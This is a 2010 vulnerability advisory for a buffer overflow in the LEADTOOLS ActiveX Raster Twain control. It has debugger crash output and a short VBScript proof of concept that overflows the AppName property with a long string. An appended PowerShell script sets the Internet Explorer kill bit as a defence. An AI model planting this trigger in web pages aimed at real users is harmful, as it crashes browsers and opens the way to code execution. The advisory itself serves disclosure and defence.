LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC

Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2

Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use, while low-level functionality is provided for flexibility and control in even the most demanding scanning applications.

Desc: The Raster Twain Object Library suffers from a buffer overflow vulnerability because it fails to check the boundary of the user input.

Tested On: Microsoft Windows XP Professional SP3 (EN)
           Windows Internet Explorer 8.0.6001.18702
           RFgen Mobile Development Studio 4.0.0.06 (Enterprise)

===============================================================

(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901          mov     word ptr [ecx],ax    ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff        cmp     byte ptr [ebx+7],0FFh    ds:0023:00410040=??

==================================================================

Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC
--
EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000

ArgDump:
--------------------------------------------------
EBP+8  016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00000000
EBP+20 0013EF6C -> BAAD0008
EBP+24 100255BC -> 10014840 -> Asc: @H@H
EBP+28 0013EDB8 -> 00000000
--
EBP+8  00150000 -> 000000C8
EBP+12 00410039
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20 00000000
EBP+24 00410041
EBP+28 7C80FF12 -> 9868146A

CompanyName      LEAD Technologies, Inc.
FileDescription  LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion      16,5,0,2
InternalName     LTRTNU
LegalCopyright   © 1991-2009 LEAD Technologies, Inc.
OriginalFileName LTRTNU.DLL
ProductName      LEADTOOLS® for Win32
ProductVersion   16.5.0.0

Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False

Exception Code: ACCESS_VIOLATION
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)
Exception Code: BREAKPOINT
Disasm: 7C90120E INT3 (ntdll.dll)

Seh Chain:
--------------------------------------------------
1 7C839AC0 KERNEL32.dll
2 FC2950   VBSCRIPT.dll
3 7C90E900 ntdll.dll

7C912F4E MOV [ECX],AX              <--- CRASH
7C96C540 CMP BYTE PTR [EBX+7],FF   <--- CRASH
7C90120F RETN                      <--- CRASH

==================================================================

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk

24.08.2010

Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php

PoC:

<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype  = "Property Let AppName As String"
memberName = "AppName"
progid     = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount   = 1
arg1 = String(9236, "A")
target.AppName = arg1
</script>
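Mitigation, as an added example that is not part of the advisory: the control is marked Safe for Scripting and Safe for Initialization, so until a fixed build is deployed the practical defence is to set the Internet Explorer kill bit (Compatibility Flags 0x400, documented by Microsoft as COMPAT_EVIL_DONT_LOAD) for the CLSID above. The script assumes an elevated PowerShell session; the registry paths and the flag value are Microsoft's documented ones, the CLSID is the one from the advisory.

```powershell
# Added example, not from the advisory: set and verify the IE kill bit for the
# LEADTOOLS Raster Twain control so Internet Explorer refuses to instantiate it.
# Run from an elevated shell.
$Clsid   = '{00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}'   # CLSID from the advisory
$KillBit = 0x400                                      # COMPAT_EVIL_DONT_LOAD

# 32-bit IE on 64-bit Windows reads the Wow6432Node view, so both keys are set.
$Paths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
)

function Set-KillBit {
    param([string]$Path, [int]$Flags)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    # Keep any flags already present and OR in the kill bit.
    $existing = (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = [int]($existing -bor $Flags)
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $new -Type DWord
}

function Test-KillBit {
    param([string]$Path, [int]$Flags)
    # True only when the key exists and the kill bit is present in the DWORD.
    $value = (Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $value) -and (($value -band $Flags) -eq $Flags)
}

foreach ($p in $Paths) {
    # Skip the Wow6432Node key on 32-bit Windows, where it does not exist.
    if ($p -like '*Wow6432Node*' -and -not [Environment]::Is64BitOperatingSystem) { continue }
    Set-KillBit -Path $p -Flags $KillBit
    $state = if (Test-KillBit -Path $p -Flags $KillBit) { 'set' } else { 'NOT set' }
    Write-Output ("{0}: kill bit {1}" -f $p, $state)
}
```

Test-KillBit can be run on its own from a non-elevated session to audit whether the kill bit is already in place on a host.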